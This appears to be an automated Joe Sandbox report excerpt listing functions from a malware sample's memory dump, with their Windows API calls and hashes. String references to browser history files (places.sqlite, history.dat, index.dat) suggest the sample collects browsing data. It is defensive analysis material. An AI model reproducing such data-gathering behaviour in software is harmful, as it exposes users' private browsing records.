                                                  Similarity
                                                  • API ID: AddressProc$memcmp
                                                  • String ID: $$8
                                                  • API String ID: 2808797137-435121686
                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                  • String ID:
                                                  • API String ID: 1042154641-0
                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                  • String ID:
                                                  • API String ID: 2947809556-0
                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                  • memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                  • String ID: history.dat$places.sqlite
                                                  • API String ID: 3093078384-467022611
                                                  • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                  • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                  • GetLastError.KERNEL32 ref: 00417627
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$File$PointerRead
                                                  • String ID:
                                                  • API String ID: 839530781-0
                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID: *.*$index.dat
                                                  • API String ID: 1974802433-2863569691
                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FilePointer
                                                  • String ID:
                                                  • API String ID: 1156039329-0
                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ChangeCloseCreateFindNotificationTime
                                                  • String ID:
                                                  • API String ID: 1631957507-0
                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                  • String ID:
                                                  • API String ID: 1125800050-0
                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                  • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: BINARY
                                                  • API String ID: 2221118986-907554435
                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                  • String ID:
                                                  • API String ID: 1161345128-0
                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /stext
                                                  • API String ID: 2081463915-3817206916
                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                  • String ID:
                                                  • API String ID: 159017214-0
                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: failed to allocate %u bytes of memory
                                                  • API String ID: 2803490479-1168259600
                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset
                                                  • String ID:
                                                  • API String ID: 1065087418-0
                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                  • String ID:
                                                  • API String ID: 1481295809-0
                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$PointerRead
                                                  • String ID:
                                                  • API String ID: 3154509469-0
